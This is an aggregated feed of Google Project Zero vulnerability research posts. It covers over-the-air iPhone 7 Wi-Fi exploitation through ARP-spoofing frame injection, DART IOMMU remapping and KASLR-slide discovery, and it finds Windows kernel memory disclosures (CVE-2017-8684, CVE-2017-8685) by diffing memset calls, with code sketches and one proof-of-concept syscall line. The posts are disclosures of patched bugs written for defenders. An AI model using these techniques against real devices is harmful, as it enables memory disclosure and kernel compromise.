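    const uint8_t arp_header[] = {0x00, 0x01, 0x08, 0x00, 0x06, 0x04, 0x00, 0x02};
    append(arp_header, sizeof(arp_header));

    // ARP body: sender hardware/protocol address, then target's.
    append(sender_mac.data(), sender_mac.size());
    append(sender_ip.data(), sender_ip.size());
    append(target_mac.data(), target_mac.size());
    append(target_ip.data(), target_ip.size());

    assert(frame.size() == 42);
    return frame;
}
```

Here `sender_mac` would carry the crafted MAC value and `sender_ip` the unused IP address from which the ping was sent, so that the host caches the association between the two.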
However, several problems arise when using this method. First, recall that the MAC address is meant to masquerade as a valid DART L2 Descriptor. As we’ve seen in our analysis of the descriptor formats, every valid L2 descriptor must have the two least-significant bits set. This poses somewhat of a problem for MAC addresses, as their bottom bits bear special significance:

Setting the bottom two bits of the MAC address’s first octet sets its group bit, indicating that it is a broadcast / multicast address (the second bit additionally marks it as locally administered). As we are sending unicast traffic (and are expecting a unicast response), it might be difficult to solicit such responses from the host. Furthermore, any network-resident security devices might inspect the traffic and flag it as suspicious (especially as we are executing a classical ARP spoofing attack). What’s more, the router or access point may refuse to route unicast traffic to a broadcast MAC.
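The clash between the descriptor format and MAC address semantics is easy to see in code. The sketch below derives the destination MAC whose bytes, read as a little-endian integer, equal the low 48 bits of a desired descriptor (the upper two bytes being ignored by DART, as established earlier), and then inspects the two special bits of the first octet. The helper names are hypothetical, and the descriptor value in the usage note is arbitrary apart from having its two low bits set.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

using Mac = std::array<uint8_t, 6>;

// Derives the MAC whose six bytes encode the low 48 bits of `descriptor`
// in little-endian order.
Mac mac_for_descriptor(uint64_t descriptor) {
    Mac mac{};
    for (int i = 0; i < 6; ++i)
        mac[i] = static_cast<uint8_t>(descriptor >> (8 * i));
    return mac;
}

// I/G bit: the least-significant bit of the first octet marks a group
// (multicast or broadcast) address.
bool is_group_address(const Mac& mac) {
    return (mac[0] & 0x01) != 0;
}

// U/L bit: the second bit of the first octet marks a locally
// administered address.
bool is_locally_administered(const Mac& mac) {
    return (mac[0] & 0x02) != 0;
}
```

Any descriptor with both low bits set, such as the arbitrary value 0x812340003, maps to a MAC beginning with 03, which is necessarily a group address.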
To get around the above limitations, we’ll simply inject the traffic directly from the firmware, without transmitting it over the air. To achieve this goal, we’ve written a small assembly stub that, when executed on the firmware, injects the encapsulated frames directly into the host, as if it were transmitted over the network.
This allows us to inject even potentially malformed traffic that would not have been routable (like unicast traffic from a broadcast MAC). Indeed, after running the ARP spoofing vector with the above mechanism, we are able to solicit responses from the host to our crafted (broadcast) MAC address (XNU does not object to sending unicast traffic to broadcast MACs). Great!

Finally, all the ducks are lined up in a row -- we can solicit traffic to MAC addresses of our choosing (even broadcast MACs), without having to modify the source MAC. Furthermore, we can shape IO-Space in order to force a new DART translation table to be allocated following a flow ring within the kernel’s VAS. Therefore, we can overwrite DART descriptors with our own crafted values, thus introducing new mappings into IO-Space. However, a single question remains -- which physical address should we map into IO-Space?
After all, we still haven’t dealt with the issue of KASLR. As the kernel’s loading addresses, both physical and virtual, are “slid” using a randomised value, we cannot locate physical addresses within the kernel until we uncover the slide’s value. If we cannot reliably locate the kernel’s base address, which physical addresses can we find?
To get around this limitation, we’ll use one more trick! While the host’s physical address space houses the DRAM, in which the kernel and application memory are stored, additional regions of physically addressable content can also be found in the PAS. For instance, hardware registers are mapped into fixed physical addresses, allowing the host to interact with peripherals on the SoC. Among these peripherals is DART itself!
As we’ve previously seen, DART’s translation process is initiated using four “L0 descriptors”. These descriptors are fed into DART’s hardware registers, denoting the base addresses of the translation tables from which the IO-Space translation process begins. If we were to map DART’s hardware registers into IO-Space, we could read the descriptors, thus allowing us to locate DART’s translation tables within the physical address space!
It should be noted that although DART’s hardware registers are addressable within the host’s physical address space, it remains unknown why IO-Space mappings should even be allowed to include ranges beyond the DRAM’s bounds. Indeed, it stands to reason that such mappings would be prohibited by the hardware. However, as it happens, no such restriction is enforced - DART freely allows any physical range to be inserted into IO-Space.
Therefore, if we wish to map-in DART’s own hardware registers into IO-Space, all that remains is to locate the physical ranges corresponding to DART’s hardware registers! To do so, we’ll use a combined approach.
First, we’ll use our research platform to extract the DART instance, from which we can subsequently retrieve the kernel VAS pointer corresponding to DART’s hardware registers. Then, using our translation table module, we can proceed to convert the kernel virtual address to its matching physical range. After doing so, we are presented with the following result:

Great! The address is clearly not within the DRAM’s range, hinting that we’re on the right track.
To verify whether this is indeed the correct address, we’ll use a second approach. As we already noted, the device hierarchy is stored within a structure called the “device tree”. Different properties relating to each peripheral, including the addresses of their corresponding hardware registers, are stored as nodes within this tree.
The device tree itself is present in a binary format within the firmware image (encapsulated in an IMG4 container). After extracting the device tree, we are presented with a blob storing the device hierarchy. Although the tree’s format is undocumented, inspecting the binary reveals an extremely simple structure; a fixed header denoting the number of children and entries contained in each node, followed by a fixed-length name, and a variable-length value. I later discovered that Jonathan Levin has similarly reversed this structure, and has written a tool to parse out its contents (albeit for an IMG3 container) -- you can check out his script here.
Regardless, after writing our own python script to parse the device tree, we are presented with the following result:

Ah-ha! We once again find the same physical address, thus concluding that our analysis of DART’s hardware registers is correct.
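The node layout described above can be sketched as a small recursive parser. This is a minimal illustration and not the script used for the research: it assumes the layout matches XNU's open-source device_tree.h definitions (two little-endian 32-bit counts with the property count first, 32-byte property names, a 32-bit length whose top bit is a flag, and values padded to four bytes). The names parse_node, find_nodes and build_node are hypothetical, and build_node exists only to produce synthetic input for experimentation.

```python
import struct

PROP_NAME_LEN = 32  # assumed width of the fixed-length property name field


def parse_node(blob, offset=0):
    """Parse one node at `offset`; return (node, offset_after_node)."""
    # Fixed header: number of properties ("entries"), then number of children.
    n_props, n_children = struct.unpack_from("<II", blob, offset)
    offset += 8

    props = {}
    for _ in range(n_props):
        raw_name = blob[offset:offset + PROP_NAME_LEN]
        name = raw_name.split(b"\x00", 1)[0].decode("ascii")
        offset += PROP_NAME_LEN
        (length,) = struct.unpack_from("<I", blob, offset)
        length &= 0x7FFFFFFF  # assumption: the top bit is a flag, not size
        offset += 4
        props[name] = blob[offset:offset + length]
        offset += (length + 3) & ~3  # assumption: values are 4-byte padded

    children = []
    for _ in range(n_children):
        child, offset = parse_node(blob, offset)
        children.append(child)

    return {"props": props, "children": children}, offset


def find_nodes(node, name):
    """Yield every node whose "name" property equals `name`."""
    if node["props"].get("name", b"").rstrip(b"\x00") == name.encode("ascii"):
        yield node
    for child in node["children"]:
        yield from find_nodes(child, name)


def build_node(props, children=()):
    """Serialise a synthetic node in the same assumed layout (testing only)."""
    out = struct.pack("<II", len(props), len(children))
    for name, value in props.items():
        out += name.encode("ascii").ljust(PROP_NAME_LEN, b"\x00")
        out += struct.pack("<I", len(value))
        out += value + b"\x00" * (-len(value) % 4)
    for child in children:
        out += child
    return out
```

With a real device tree, the blob would first have to be extracted from its IMG4 container; the peripheral's register ranges could then be read from the matching node's properties.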
Putting it all together, we can now utilise our exploit primitive to map the physical address containing DART’s registers into IO-Space. Once mapped, we can proceed to read the hardware registers’ values, including the L0 descriptors. It should be noted that attempting to access the hardware registers from the host requires strict 32-bit load and store operations -- attempting a 64-bit load from the hardware registers results in a garbled value being returned. Curiously, however, DMA-ing to and from the hardware registers from the Wi-Fi chip goes unhindered!

Using the L0 descriptor, we can now extract the physical address of the next translation table in DART’s hierarchy. Then, by repeating the exploit primitive and mapping-in the newly discovered physical address into IO-Space, we can repeat the process, descending down DART’s translation hierarchy until we reach a DART L2 translation table. Thus, using one flow ring, we can bring them all, and in IO-Space bind them.
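The descent described above is essentially a loop: decode a descriptor, map the table it points to, read that table, and repeat. The sketch below models only that control flow. The descriptor encoding (valid bits in the low two bits, a page-aligned address in the rest), the page size, the descriptor width and the number of levels are all hypothetical placeholders rather than DART's real format, and read_phys stands in for "map the address with the exploit primitive, then DMA-read it from the Wi-Fi chip".

```python
PAGE_SIZE = 0x1000   # hypothetical table size
DESC_SIZE = 8        # hypothetical descriptor width, in bytes
VALID_BITS = 0b11    # hypothetical "valid" marker in the low bits


def next_table(descriptor):
    """Return the physical address a descriptor points to, or None if invalid."""
    if descriptor & VALID_BITS != VALID_BITS:
        return None
    return descriptor & ~(PAGE_SIZE - 1)


def first_valid_entry(raw):
    """Return the target of the first valid descriptor in a raw table."""
    for off in range(0, len(raw), DESC_SIZE):
        target = next_table(int.from_bytes(raw[off:off + DESC_SIZE], "little"))
        if target is not None:
            return target
    return None


def descend(read_phys, l0_descriptor, levels=2):
    """Follow `levels` descriptors downwards, starting from an L0 descriptor.

    `read_phys(addr, size)` is a stand-in for mapping `addr` into IO-Space
    and reading it back over DMA.
    """
    table = next_table(l0_descriptor)
    if table is None:
        raise ValueError("L0 descriptor is not marked valid")
    for _ in range(levels - 1):
        table = first_valid_entry(read_phys(table, PAGE_SIZE))
        if table is None:
            raise ValueError("no valid descriptor found in table")
    return table
```

Each call to read_phys corresponds to one use of the exploit primitive, which is why the number of levels directly determines how many times the primitive must be repeated.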
Once an L2 translation table is located within the physical address space, we can proceed to map it into IO-Space using our exploit primitive one last time, thus inserting DART’s own translation table into IO-Space!
By mapping DART’s translation table into its own IO-Space ranges, we can now utilise DMA access from the Wi-Fi chip in order to freely introduce new mappings into IO-Space (removing the need for the exploit primitive), thus gaining full control over the host’s physical memory!

Furthermore, as DART’s translation entries are never cleared, we are guaranteed that once the malicious IO-Space entries are inserted, they remain accessible to the Wi-Fi chip, until the device itself reboots. As such, the exploit process need only occur once in order to introduce a backdoor allowing the Wi-Fi chip to freely access the host’s physical memory.
One curiosity of note is that DART has a rather large TLB. Therefore, changes in IO-Space may not be reflected immediately, but only once the stale entries are evicted from the cache. Nonetheless, this is easily dealt with by mapping in IO-Space addresses in a circular pattern, thus allowing stale entries to get cleared.
Finding The KASLR Slide
At long last, we have complete control over the entire physical address space, directly from the Wi-Fi chip. Consequently, we can proceed to map and modify any physical address we desire, even those corresponding to the kernel’s data structures.
While this form of access is sufficient in order to subvert the kernel, there’s one tiny snag we have yet to deal with: KASLR. Since the kernel’s physical base address is randomised using the KASLR slide, and we have yet to deduce its value, we might have to resort to scanning the DRAM’s physical address ranges until we locate the kernel itself.
This approach is rather inefficient. Instead, we can opt for a more elegant path. Recall that, as we’ve just seen, hardware registers may be freely mapped into IO-Space. As hardware registers are not affected by the KASLR slide (indeed they are mapped at fixed physical addresses), they can be trivially located regardless of the current “slide” value.
Perhaps one of the hardware registers can be used as an oracle to deduce the KASLR slide?
Recall that newer devices, such as the iPhone 7, enforce the integrity of the kernel using a hardware mechanism dubbed “KTRR”. Simply put, this mechanism allows the device to provide “lockdown” regions, to which subsequent modifications are prohibited. These regions are programmed using a special set of hardware registers.

Amusingly, this very same mechanism can be used to deduce the KASLR slide!
By mapping in physical addresses corresponding to the aforementioned hardware registers, we can proceed to read their contents directly from IO-Space. This, in turn, reveals the physical ranges encoded in the “lockdown registers”, which store none other than the kernel’s base address.
The Exploit
Summing up all of the above, we’ve finally written an exploit, allowing full control over the device’s physical memory over-the-air, using Wi-Fi communication alone. You can find the exploit here.
It should be noted that several smaller details have been omitted from the blog post, in the interest of (some) brevity. For instance, locating the offset between the newly allocated DART translation table and the flow ring requires a process of probing various IO-Space addresses, while also guaranteeing that alignment constraints enforced by the granularity of ring item sizes are met. We encourage researchers to read the exploit’s code in order to discover any such omitted parts.
The exploit has been tested against the iPhone 7 running iOS 10.2 (14C92). The vulnerabilities are present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different iOS versions would need to adjust the symbols used by the exploit.

Upon successful execution, the exploit exposes APIs to read and write the host’s physical memory directly over-the-air, by mapping in any requested address to the controlled DART L2 translation table, and issuing DMA accesses to the corresponding mapped IO-Space addresses.
For convenience’s sake, the exploit also locates the kernel’s physical base address using the method we described above (using the KTRR read-only region registers), thus allowing researchers to easily explore the kernel’s physical memory ranges.
Afterword
Over the course of this series of blog posts, we’ve explored the security of the Wi-Fi stack on Apple devices. Consequently, we constructed a complete exploit chain, allowing attackers to reliably gain control over the iOS kernel on an iPhone 7 using Wi-Fi communication alone.
During our research, we explored several components, including Broadcom’s Wi-Fi firmware, the DART IOMMU, and Apple’s Wi-Fi drivers. Each of the aforementioned components is proprietary, thus requiring substantial effort to gain visibility into their operations. We hope that by providing the tools used to conduct our research, additional exploration of these surfaces will be performed in the future, allowing for their corresponding security postures to be enhanced.
We’ve also seen how the iPhone utilises hardware security mechanisms, such as DART, in order to provide isolation between the host and potentially malicious components. These mechanisms significantly raise the bar for launching successful attacks targeting the host. Nonetheless, additional research into DART is needed in order to explore all facets of its implementation. For instance, while we’ve explored the enacted IO-Space through the prism of the Wi-Fi chip, additional PCIe components exist on the SoC, which are similarly guarded by DARTs. These components remain, as of yet, unexplored.
Apart from fixing individual vulnerabilities in the security boundaries between the host and the Wi-Fi chip, several structural enhancements can be applied to make future exploitation harder. This includes introducing read-only mappings to DART (if they are not already present), clearing unused descriptors from DART’s translation tables upon rebooting the associated component, and preventing IO-Space mappings from exposing physical ranges beyond the DRAM.
Lastly, while memory isolation goes a long way towards defending the host against a rogue Wi-Fi chip, the host must still consider all communications originating from the Wi-Fi chip as potentially malicious. To this end, the numerous communication channels between the two endpoints (including event packets, “ioctls”, and control commands), must be designed to withstand malformed data transmitted by the chip.
Categories: Security

Using Binary Diffing to Discover Windows Kernel Memory Disclosure Bugs

Google Project Zero - Thu, 10/05/2017 - 12:22
Posted by Mateusz Jurczyk of Google Project Zero
Patch diffing is a common technique of comparing two binary builds of the same code – a known-vulnerable one and one containing a security fix. It is often used to determine the technical details behind ambiguously-worded bulletins, and to establish the root causes, attack vectors and potential variants of the vulnerabilities in question. The approach has attracted plenty of research [1][2][3] and tooling development [4][5][6] over the years, and has been shown to be useful for identifying so-called 1-day bugs, which can be exploited against users who are slow to adopt latest security patches. Overall, the risk of post-patch vulnerability exploitation is inevitable for software which can be freely reverse-engineered, and is thus accepted as a natural part of the ecosystem.
In a similar vein, binary diffing can be utilized to discover discrepancies between two or more versions of a single product, if they share the same core code and coexist on the market, but are serviced independently by the vendor. One example of such software is the Windows operating system, which currently has three versions under active support – Windows 7, 8 and 10 [7]. While Windows 7 still has a nearly 50% share on the desktop market at the time of this writing [8], Microsoft is known for introducing a number of structural security improvements and sometimes even ordinary bugfixes only to the most recent Windows platform. This creates a false sense of security for users of the older systems, and leaves them vulnerable to software flaws which can be detected merely by spotting subtle changes in the corresponding code in different versions of Windows.
In this blog post, we will show how a very simple form of binary diffing was effectively used to find instances of 0-day uninitialized kernel memory disclosure to user-mode programs. Bugs of this kind can be a useful link in local privilege escalation exploit chains (e.g. to bypass kernel ASLR), or just plainly expose sensitive data stored in the kernel address space. If you're not familiar with the bug class, we recommend checking the slides of the Bochspwn Reloaded talk given at the REcon and Black Hat USA conferences this year as a prior reading [9].
Chasing memset calls
Most kernel information disclosures are caused by leaving parts of large memory regions uninitialized before copying them to user-mode; be they structures, unions, arrays or some combination of these constructs. This typically means that the kernel provides a ring-3 program with more output data than there is relevant information, for a number of possible reasons: compiler-inserted padding holes, unused structure/union fields, large fixed-sized arrays used for variable-length content etc. In the end, these bugs are rarely fixed by switching to smaller buffers – more often than not, the original behavior is preserved, with the addition of one extra memset function call which pre-initializes the output memory area so it doesn't contain any leftover stack/heap data. This makes such patches very easy to recognize during reverse engineering.
When filing issue #1267 in the Project Zero bug tracker (Windows Kernel pool memory disclosure in win32k!NtGdiGetGlyphOutline, found by Bochspwn) and performing some cursory analysis, I realized that the bug was only present in Windows 7 and 8, while it had been internally fixed by Microsoft in Windows 10. The figure below shows the obvious difference between the vulnerable and fixed forms of the code, as decompiled by the Hex-Rays plugin and diffed by Diaphora:

Figure 1. A crucial difference in the implementation of win32k!NtGdiGetGlyphOutline in Windows 7 and 10
Considering how evident the patch was in Windows 10 (a completely new memset call in a top-level syscall handler), I suspected there could be other similar issues lurking in the older kernels that have been silently fixed by Microsoft in the more recent ones. To verify this, I decided to compare the number of memset calls in all top-level syscall handlers (i.e. functions starting with the Nt prefix, implemented by both the core kernel and graphical subsystem) between Windows 7 and 10, and later between Windows 8.1 and 10. Since in principle this was a very simple analysis, an adequately simple approach could be used to get sufficient results, which is why I decided to perform the diffing against code listings generated by the IDA Pro disassembler.
When doing so, I quickly found out that each memory zeroing operation found in the kernel is compiled in one of three ways: with a direct call to the memset function, its inlined form implemented with the rep stosd x86 instruction, or an unfolded series of mov x86 instructions:
Figure 2. A direct memset function call to reset memory in nt!NtCreateJobObject (Windows 7)
Figure 3. Inlined memset code used to reset memory in nt!NtRequestPort (Windows 7)
Figure 4. A series of mov instructions used to reset memory in win32k!NtUserRealInternalGetMessage (Windows 8.1)
The two most common cases (memset calls and rep stosd) are both decompiled to regular invocations of memset() by the Hex-Rays decompiler:
Figures 5 and 6. A regular memset call is indistinguishable from an inlined rep stosd construct in the Hex-Rays view
Unfortunately, a sequence of mov's with a zeroed-out register as the source operand is not recognized by Hex-Rays as a memset yet, but the number of such occurrences is relatively low, and hence can be neglected until we manually deal with any resulting false-positives later in the process. In the end, we decided to perform the diffing using decompiled .c files instead of regular assembly, just to make our life a bit easier.
A complete list of steps we followed to arrive at the final outcome is shown below. We repeated them twice, first for Windows 7/10 and then for Windows 8.1/10:

  1. Decompiled ntkrnlpa.exe and win32k.sys from Windows 7 and 8.1 to their .c counterparts with Hex-Rays, and did the same with ntoskrnl.exe, tm.sys, win32kbase.sys and win32kfull.sys from Windows 10.
  2. Extracted a list of kernel functions containing memset references (taking their quantity into account too), and sorted them alphabetically.
  3. Performed a regular textual diff against the two lists, and chose the functions which had more memset references on Windows 10.
  4. Filtered the output of the previous step against the list of functions present in the older kernels (7 or 8.1, again pulled from IDA Pro), to make sure that we didn't include routines which were only introduced in the latest system.
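Steps 2 to 4 above can be approximated with a short script. The sketch below is an illustration of the idea rather than the tooling actually used: it assumes that each function in the decompiled .c file begins with a header line at column 0 that ends in a closing parenthesis (as Hex-Rays output typically does), and that zeroing appears as a literal memset( call. The names count_memsets and new_memsets are hypothetical.

```python
import re

# Assumed shape of a decompiled function header at column 0, e.g.
#   "int __stdcall NtFoo(int a1, int a2)"
FUNC_HEADER = re.compile(r"^[A-Za-z_][^;=]*?\b(\w+)\s*\([^;]*\)\s*$")
MEMSET_CALL = re.compile(r"\bmemset\s*\(")


def count_memsets(source):
    """Map each function name to the number of memset() calls in its body."""
    counts = {}
    current = None
    for line in source.splitlines():
        header = FUNC_HEADER.match(line)
        if header:
            # A new function starts; record it even if it never calls memset.
            current = header.group(1)
            counts.setdefault(current, 0)
        elif current is not None:
            counts[current] += len(MEMSET_CALL.findall(line))
    return counts


def new_memsets(old_counts, new_counts):
    """Functions that exist in the old build but have more memsets in the new."""
    return sorted(
        name
        for name, n_new in new_counts.items()
        if name in old_counts and n_new > old_counts[name]
    )
```

Restricting the result to names already present in the old build plays the role of step 4, so routines introduced only in the newer system are dropped. Unfolded mov sequences are not counted, so the output still needs the manual review described in the text.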

In numbers, we ended up with the following results:

                    ntoskrnl functions  ntoskrnl syscall handlers  win32k functions  win32k syscall handlers
Windows 7 vs. 10    153                 8                          89                16
Windows 8.1 vs. 10  127                 5                          67                11
Table 1. Number of old functions with new memset usage in Windows 10, relative to previous system editions
Quite intuitively, the Windows 7/10 comparison yielded more differences than the Windows 8.1/10 one, as the system progressively evolved from one version to the next. It's also interesting to see that the graphical subsystem had fewer changes detected in general, but more than the core kernel specifically in the syscall handlers. Once we knew the candidates, we manually investigated each of them in detail, discovering two new vulnerabilities in the win32k!NtGdiGetFontResourceInfoInternalW and win32k!NtGdiEngCreatePalette system services. Both of them were addressed in the September Patch Tuesday, and since they have some unique characteristics, we will discuss each of them in the subsequent sections.
win32k!NtGdiGetFontResourceInfoInternalW (CVE-2017-8684)
The inconsistent memset which gave away the existence of the bug is as follows:
Figure 8. A new memset added in win32k!NtGdiGetFontResourceInfoInternalW in Windows 10
This was a stack-based kernel memory disclosure of about 0x5c (92) bytes. The structure of the function follows a common optimization scheme used in Windows, where a local buffer located on the stack is used for short syscall outputs, and the pool allocator is only invoked for larger ones. The relevant snippet of pseudocode is shown below:
Figure 9. Optimized memory usage found in the syscall handler
It's interesting to note that even in the vulnerable form of the routine, memory disclosure was only possible when the first (stack) branch was taken, and thus only for requested buffer sizes of up to 0x5c bytes. That's because the dynamic PALLOCMEM pool allocator does zero out the requested memory before returning it to the caller:
Figure 10. PALLOCMEM always resets allocated memory
Furthermore, the issue is also a great example of how another peculiar behavior in interacting with user-mode may contribute to the introduction of a security flaw (see slides 32-33 of the Bochspwn Reloaded deck). The code pattern at fault is as follows:
  1. Allocate a temporary output buffer based on a user-specified size (dubbed a4 in this case), as discussed above.
  2. Have the requested information written to the kernel buffer by calling an internal win32k!GetFontResourceInfoInternalW function.
  3. Write the contents of the entire temporary buffer back to ring-3, regardless of how much data was actually filled out by win32k!GetFontResourceInfoInternalW.
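The three steps above can be modelled in a few lines. This is a toy simulation and not the kernel's code: the stack buffer is a bytearray pre-filled with stale data, get_font_info is a hypothetical stand-in for the internal helper that is assumed to write only four bytes, and syscall_model is an invented name. The zero_first flag plays the role of the memset added in Windows 10.

```python
STACK_BUF_SIZE = 0x5C  # size of the on-stack fast-path buffer, per the text


def get_font_info(out_buf):
    """Stand-in for the internal helper: fills only the first four bytes."""
    out_buf[0:4] = (1).to_bytes(4, "little")
    return 4  # number of meaningful bytes written


def syscall_model(requested_size, stale_stack, zero_first=False):
    """Return the bytes that would be copied back to user mode."""
    if requested_size > STACK_BUF_SIZE:
        raise NotImplementedError("pool path not modelled (it is zeroed)")
    # Step 1: the "allocation" reuses whatever the stack already held.
    buf = bytearray(stale_stack[:STACK_BUF_SIZE])
    if zero_first:
        buf[:] = bytes(len(buf))  # models the memset added by the fix
    # Step 2: the helper writes fewer bytes than were requested.
    get_font_info(buf)
    # Step 3: the full requested size is copied out, not the written length.
    return bytes(buf[:requested_size])
```

Calling syscall_model(0x5C, b"\xAA" * 0x5C) returns four meaningful bytes followed by 88 bytes of the stale filler, whereas the same call with zero_first=True returns zeros in their place.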

Here, the vulnerable win32k!NtGdiGetFontResourceInfoInternalW handler actually "knows" the length of meaningful data (it is even passed back to the user-mode caller through the 5th syscall parameter), but it still decides to copy the full amount of memory requested by the client, even though it is completely unnecessary for the correct functioning of the syscall:
Figure 11. There are v10 output bytes, but the function copies the full a4 buffer size.
The combination of a lack of buffer pre-initialization and allowing the copying of redundant bytes is what makes this an exploitable security bug. In the proof-of-concept program, we used an undocumented information class 5, which only writes to the first four bytes of the output buffer, leaving the remaining 88 uninitialized and ready to be disclosed to the attacker.
win32k!NtGdiEngCreatePalette (CVE-2017-8685)
In this case, the vulnerability was fixed in Windows 8 by introducing the following memset into the syscall handler, while still leaving Windows 7 exposed:
Figure 12. A new memset added in win32k!NtGdiEngCreatePalette in Windows 8
The system call in question is responsible for creating a kernel GDI palette object consisting of N 4-byte color entries, for a user-controlled N. Again, a memory usage optimization is employed by the implementation – if N is less than or equal to 256 (1024 bytes in total), these items are read from user-mode to a kernel stack buffer using win32k!bSafeReadBits; otherwise, they are just locked in ring-3 memory by calling win32k!bSecureBits. As you can guess, the memory region with the extra memset applied to it is the local buffer used to temporarily store a list of user-defined RGB colors, and it is later passed to win32k!EngCreatePalette to actually create the palette object. The question is, how do we have the buffer remain uninitialized but still passed for the creation of a non-empty palette? The answer lies in the implementation of the win32k!bSafeReadBits routine:
Figure 13. Function body of win32k!bSafeReadBits
As you can see in the decompiled listing above, the function completes successfully without performing any actual work, if either the source or destination pointer is NULL. Here, the source address comes directly from the syscall's 3rd argument, which doesn't undergo any prior sanitization. This means that we can make the syscall think it has successfully captured an array of up to 256 elements from user-mode, while in reality the stack buffer isn't written to at all. This is achieved with the following system call invocation in our proof-of-concept program:
HPALETTE hpal = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);
Once the syscall returns, we receive a handle to the palette which internally stores the leaked stack memory. In order to read it back to our program, one more call to the GetPaletteEntries API is needed. To reiterate the severity of the bug, its exploitation allows an attacker to disclose an entire 1 kB of uninitialized kernel stack memory, which is a very powerful primitive to have in one's arsenal.
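The interaction between the NULL source pointer and the uninitialized stack buffer can be illustrated with a small model. It is a simulation under stated assumptions rather than a reconstruction of win32k: safe_read_bits only mirrors the behaviour described in the text (success without copying when either pointer is NULL), None stands in for NULL, and create_palette_model and its parameters are hypothetical names.

```python
PALETTE_MAX_STACK_ENTRIES = 256  # entries handled via the stack buffer
ENTRY_SIZE = 4                   # bytes per color entry


def safe_read_bits(dst, src, size):
    """Model of the described behaviour: a NULL pointer means success, no copy."""
    if dst is None or src is None:
        return True
    dst[:size] = src[:size]
    return True


def create_palette_model(count, user_colors, stale_stack, zero_first=False):
    """Return the bytes that end up stored in the palette object."""
    if count > PALETTE_MAX_STACK_ENTRIES:
        raise NotImplementedError("locked user-memory path not modelled")
    size = count * ENTRY_SIZE
    # The local array initially holds whatever was left on the stack.
    buf = bytearray(stale_stack[:size])
    if zero_first:
        buf[:] = bytes(size)  # models the memset added by the fix
    if not safe_read_bits(buf, user_colors, size):
        return None
    # The palette is created from the buffer, whether or not it was written.
    return bytes(buf)
```

Passing None as user_colors with a count of 256 makes the model return the full 1024 bytes of stale stack contents, which corresponds to what GetPaletteEntries would later hand back to the caller.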
In addition to the memory disclosure itself, other interesting quirks can be observed in the nearby code area. If you look closely at the code of win32k!NtGdiEngCreatePalette in Windows 8.1 and 10, you will spot an interesting disparity between them: the stack array is fully reset in both cases, but it's achieved in different ways. On Windows 8.1, the function "manually" sets the first DWORD to 0 and then calls memset() on the remaining 0x3FC bytes, while Windows 10 just plainly memsets the whole 0x400-byte area. The reason for this is quite unclear, and even though the end result is the same, the discrepancy provokes the idea that not just the existence of memset calls can be compared across Windows versions, but also possibly the size operands of those calls.
Figure 14. Different code constructs used to zero out a 256-item array on Windows 8.1 and 10
On a last related note, the win32k!NtGdiEngCreatePalette syscall may also be quite useful for stack spraying purposes during kernel exploitation, as it allows programs to easily write 1024 controlled bytes to a contiguous area of the stack. While the buffer size is smaller than what e.g. nt!NtMapUserPhysicalPages has to offer, the buffer itself ends at a higher offset relative to the stack frame of the top-level syscall handler, which can make an important difference in certain scenarios.
Conclusions
The aim of this blog post was to illustrate that security-relevant differences in concurrently supported branches of a single product may be used by malicious actors to pinpoint significant weaknesses or just regular bugs in the more dated versions of said software. Not only does it leave some customers exposed to attacks, but it also visibly reveals what the attack vectors are, which works directly against user security. This is especially true for bug classes with obvious fixes, such as kernel memory disclosure and the added memset calls. The "binary diffing" process discussed in this post was in fact pseudocode-level diffing that didn't require much low-level expertise or knowledge of the operating system internals. It could have been easily used by non-advanced attackers to identify the three mentioned vulnerabilities (CVE-2017-8680, CVE-2017-8684, CVE-2017-8685) with very little effort. We hope that these were some of the very few instances of such "low hanging fruit" being accessible to researchers through diffing, and we encourage software vendors to make sure of it by applying security improvements consistently across all supported versions of their software.
References
Categories: Security

Over The Air - Vol. 2, Pt. 2: Exploiting The Wi-Fi Stack on Apple Devices

Google Project Zero - Tue, 10/03/2017 - 12:18
Posted by Gal Beniamini, Project Zero
In this blog post we’ll continue our journey towards over-the-air exploitation of the iPhone, by means of Wi-Fi communication alone. This part of the research will focus on the firmware running on Broadcom’s Wi-Fi SoC present on the iPhone 7.
We’ll begin by performing a deep dive into the firmware itself; discovering new attack surfaces along the way. After auditing these attack surfaces, we’ll uncover several vulnerabilities. Finally, we’ll develop a fully functional exploit against one of the aforementioned vulnerabilities, thereby gaining code execution on the iPhone 7’s Wi-Fi chip. In addition to gaining code execution, we’ll also develop a covert backdoor, allowing us to remotely control the chip over-the-air.

Along the way, we’ll come across several new security mechanisms developed by Broadcom. While these mechanisms carry the potential to make exploitation harder, they remained rather ineffective in this particular case. By exploring the mechanisms themselves, we were able to discover methods to bypass their intended protections. Nonetheless, we remain hopeful that the issues highlighted in this blog post will help inspire stronger mitigations in the future.
All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5) were reported to Broadcom and subsequently fixed. I’d like to thank Broadcom for being highly responsive and for handling the issues in a timely manner. While we did not perform a full analysis on the breadth of these issues, a minimal analysis is available in the introduction to the previous blog post.
And now, without further ado, let’s get to it!
Exploring The Firmware
Combining the extracted ROM image we had just acquired with the resident RAM image, we can finally piece together the complete firmware image. With that, all that remains is to load the image into a disassembler and begin exploring.
While the ROM image on the BCM4355C0 is slightly larger than that of previously analysed Android-resident Wi-Fi chips, it’s still rather small (spanning only 896KB). Consequently, Broadcom has once again employed the same tricks in order to conserve as much memory as possible; including compiling the bulk of the code using the Thumb-2 instruction set and stripping away most of the symbols.
As for the ROM’s layout, it follows the same basic structure as that of its Android counterparts; beginning with a code chunk, followed by a blob of constant data (including strings and CRC polynomials), and ending with “trampolines” into detection points in the Wi-Fi firmware’s RAM (and some more spare data).

The same cannot be said of the RAM image; while some similarities exist between the current image and the previously analysed ones, their internal layouts are substantially different. Whereas Android-resident firmwares contained interspersed heap chunks between code and data blobs, this quirk is no longer present in the current RAM image. Instead, the heap chunks are mostly placed in a linear fashion. One exception to this rule is the initialisation code present in the RAM -- once the firmware’s bootup process completes, this blob is reclaimed, and is thereafter converted into an additional heap chunk.

Curiously, the stack is no longer located after the heap, but rather precedes it. This modification has the advantage of preventing potential collisions between the stack and the heap (which were possible in previous firmware versions).
To further our understanding of the firmware, let’s attempt to identify the set of supported high-level features. While ROM images typically contain a wealth of features, not all OEMs choose to utilise every single feature. Instead, the supported features are governed by the RAM’s contents, which selectively adds support for the capabilities chosen by the OEM.
